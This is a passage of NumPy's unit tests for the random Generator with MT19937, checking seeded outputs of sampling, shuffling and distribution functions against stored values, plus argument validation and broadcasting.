def test_choice_multidimensional_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[0], [2], [4], [6]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random = Generator(MT19937(self.seed))
non_contig = random.choice(5, 3, p=p[::2])
random = Generator(MT19937(self.seed))
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh 9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
import hashlib
choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
random = Generator(MT19937(self.seed))
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != 'little':
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert_(choice_hash == res)
def test_bytes(self):
random = Generator(MT19937(self.seed))
actual = random.bytes(10)
desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random = Generator(MT19937(self.seed))
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=1)
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=-1)
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_shuffle_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.shuffle, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.shuffle, arr, 3)
assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
arr = [[1, 2, 3], [4, 5, 6]]
assert_raises(NotImplementedError, random.shuffle, arr, 1)
def test_permutation(self):
random = Generator(MT19937(self.seed))
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
bad_x_str = "abcd"
assert_raises(np.AxisError, random.permutation, bad_x_str)
bad_x_float = 1.2
assert_raises(np.AxisError, random.permutation, bad_x_float)
random = Generator(MT19937(self.seed))
integer_val = 10
desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_permutation_custom_axis(self):
a = np.arange(16).reshape((4, 4))
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=1)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=-1)
assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[42, 41],
[42, 48],
[44, 50]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456)
desired = 42
assert_array_equal(actual, desired)
def test_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[32.9850547060149, 39.0219480493301],
[56.2006134779419, 57.3474165711485],
[55.4243733880198, 55.4209797925213]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.5439892869558927, 0.45601071304410745],
[0.5588917345860708, 0.4411082654139292 ]],
[[0.5632074165063435, 0.43679258349365657],
[0.54862581112627, 0.45137418887373015]],
[[0.49961831357047226, 0.5003816864295278 ],
[0.52374806183482, 0.47625193816517997]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random = Generator(MT19937(self.seed))
non_contig = random.dirichlet(alpha, size=(3, 2))
random = Generator(MT19937(self.seed))
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[0.098845481066258, 1.560752510746964],
[0.075730916041636, 1.769098974710777],
[1.488602544592235, 2.49684815275751 ]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random = Generator(MT19937(self.seed))
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[0.461720027077085, 1.100441958872451],
[1.100337455217484, 0.91421736740018 ],
[0.500811891303113, 0.826802454552058]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
[18.73983605132985, 19.57961681699238],
[18.17897755150825, 18.17653912505234]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random = Generator(MT19937(self.seed))
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[ 1, 10],
[ 1, 12],
[ 9, 10]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random = Generator(MT19937(self.seed))
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[ 4.688397515056245, -0.289514845417841],
[ 4.981176042584683, -0.633224272589149],
[-0.055915275687488, -0.333962478257953]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[ 9, 9],
[ 9, 9],
[10, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random = Generator(MT19937(self.seed))
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.156353949272393, 1.195863024830054],
[-3.435458081645966, 1.656882398925444],
[ 0.924824032467446, 1.251116432209336]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random = Generator(MT19937(self.seed))
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-4.338584631510999, 1.890171436749954],
[-4.64547787337966 , 2.514545562919217],
[ 1.495389489198666, 1.967827627577474]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[ 0.0268252166335, 13.9534486483053],
[ 0.1204014788936, 2.2422077497792],
[ 4.2484199496128, 12.0093343977523]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random = Generator(MT19937(self.seed))
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[14, 17],
[3, 18],
[5, 1]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[1, 5, 1, 6, 4, 3],
[4, 2, 6, 2, 4, 2]],
[[5, 3, 2, 6, 3, 1],
[4, 4, 0, 2, 3, 7]],
[[6, 3, 1, 5, 3, 2],
[5, 5, 3, 1, 2, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
random = Generator(MT19937(self.seed))
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size)
desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
[-0.9967333370066214, 10.342002097029821 ]],
[[ 0.7850019631242964, 11.181113712443013 ],
[ 0.8901349653255224, 8.873825399642492 ]],
[[ 0.7130260107430003, 9.551628690083056 ],
[ 0.7127098726541128, 11.991709234143173 ]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = random.multivariate_normal(mean, cov)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='other')
assert_raises(ValueError, random.multivariate_normal,
np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal,
mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal,
mu, np.eye(3))
def test_negative_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[543, 727],
[775, 760],
[600, 674]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100,
[np.nan] * 10)
def test_noncentral_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[ 1.70561552362133, 15.97378184942111],
[13.71483425173724, 20.17859633310629],
[11.3615477156643 , 3.67891108738029]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[9.41427665607629e-04, 1.70473157518850e-04],
[1.14554372041263e+00, 1.38187755933435e-03],
[1.90659181905387e+00, 1.21772577941822e+00]])
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[0.82947954590419, 1.80139670767078],
[6.58720057417794, 7.00491463609814],
[6.31101879073157, 6.30982307753005]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[0.060310671139 , 0.23866058175939],
[0.86860246709073, 0.2668510459738 ],
[0.23375780078364, 1.88922102885943]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random = Generator(MT19937(self.seed))
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random = Generator(MT19937(self.seed))
actual = random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.618412914693162, 2.635726692647081],
[-2.116923463013243, 0.807460983059643],
[ 1.446547137248593, 2.485684213886024]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.)
def test_pareto(self):
random = Generator(MT19937(self.seed))
actual = random.pareto(a=.123456789, size=(3, 2))
desired = np.array([[1.0394926776069018e+00, 7.7142534343505773e+04],
[7.2640150889064703e-01, 3.4650454783825594e+05],
[4.5852344481994740e+04, 6.5851383009539105e+07]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random = Generator(MT19937(self.seed))
actual = random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[0, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('int64').max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random = Generator(MT19937(self.seed))
actual = random.power(a=.123456789, size=(3, 2))
desired = np.array([[1.977857368842754e-09, 9.806792196620341e-02],
[2.482442984543471e-10, 1.527108843266079e-01],
[8.188283434244285e-02, 3.950547209346948e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[ 4.51734079831581, 15.6802442485758 ],
[ 4.19850651287094, 17.08718809823704],
[14.7907457708776 , 15.85545333419775]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
random = Generator(MT19937(self.seed))
actual = random.standard_cauchy(size=(3, 2))
desired = np.array([[-1.489437778266206, -3.275389641569784],
[ 0.560102864910406, -0.680780916282552],
[-1.314912905226277, 0.295852965660225]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.standard_exponential(size=(3, 2), method='inv')
desired = np.array([[0.102031839440643, 1.229350298474972],
[0.088137284693098, 1.459859985522667],
[1.093830802293668, 1.256977002164613]])
assert_array_almost_equal(actual, desired, decimal=15)
    def test_standard_exponential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62970724056362, 1.22379851271008],
[3.899412530884 , 4.12479964250139],
[3.74994102464584, 3.74929307690815]])
assert_array_almost_equal(actual, desired, decimal=14)
    def test_standard_gamma_scalar_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(3, dtype=np.float32)
desired = 2.9242148399353027
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random = Generator(MT19937(self.seed))
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[0.62971, 1.2238 ],
[3.89941, 4.1248 ],
[3.74994, 3.74929]])
assert_array_almost_equal(actual, desired, decimal=5)
    def test_standard_gamma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array([[10.14987, 7.87012],
[ 9.46284, 12.56832],
[13.82495, 7.81533]], dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
random = Generator(MT19937(self.seed))
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.,
dtype='int32')
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20,
out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1),
out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.)
def test_standard_normal(self):
random = Generator(MT19937(self.seed))
actual = random.standard_normal(size=(3, 2))
desired = np.array([[-1.870934851846581, 1.25613495182354 ],
[-1.120190126006621, 0.342002097029821],
[ 0.661545174124296, 1.181113712443012]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random = Generator(MT19937(self.seed))
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array([[-1.484666193042647, 0.30597891831161 ],
[ 1.056684299648085, -0.407312602088507],
[ 0.130704414281157, -2.038053410490321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random = Generator(MT19937(self.seed))
actual = random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[ 7.86664070590917, 13.6313848513185 ],
[ 7.68152445215983, 14.36169131136546],
[13.16105603911429, 13.72341621856971]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random = Generator(MT19937(self.seed))
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[2.13306255040998 , 7.816987531021207],
[2.015436610109887, 8.377577533009589],
[7.421792588856135, 7.891185744455209]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float,
throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random = Generator(MT19937(self.seed))
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[ 1.107972248690106, 2.841536476232361],
[ 1.832602376042457, 1.945511926976032],
[-0.260147475776542, 2.058047492231698]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random = Generator(MT19937(self.seed))
r = random.vonmises(mu=0., kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random = Generator(MT19937(self.seed))
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[0.26871721804551, 3.2233942732115 ],
[2.20328374987066, 2.40958405189353],
[2.07093587449261, 0.73073890064369]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random = Generator(MT19937(self.seed))
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.138613914769468, 1.306463419753191],
[0.111623365934763, 1.446570494646721],
[1.257145775276011, 1.914247725027957]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random = Generator(MT19937(self.seed))
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.)
def test_zipf(self):
random = Generator(MT19937(self.seed))
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[ 1, 1],
[ 10, 867],
[354, 2]])
assert_array_equal(actual, desired)
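# Illustrative aside (not part of the original test module): every
# TestRandomDist case relies on the same reproducibility contract, namely
# that reseeding MT19937 with one value makes any distribution method
# replay identical draws.
_a = Generator(MT19937(1234567890)).normal(size=(3, 2))
_b = Generator(MT19937(1234567890)).normal(size=(3, 2))
assert np.array_equal(_a, _b)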
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def test_uniform(self):
random = Generator(MT19937(self.seed))
low = [0]
high = [1]
uniform = random.uniform
desired = np.array([0.16693771389729, 0.19635129550675, 0.75563050964095])
random = Generator(MT19937(self.seed))
actual = random.uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
random = Generator(MT19937(self.seed))
actual = random.uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
random = Generator(MT19937(self.seed))
desired = np.array([-0.38736406738527, 0.79594375042255, 0.0197076236097])
random = Generator(MT19937(self.seed))
actual = random.normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
normal = random.normal
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
desired = np.array([0.18719338682602, 0.73234824491364, 0.17928615186455])
random = Generator(MT19937(self.seed))
beta = random.beta
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
random = Generator(MT19937(self.seed))
actual = random.beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
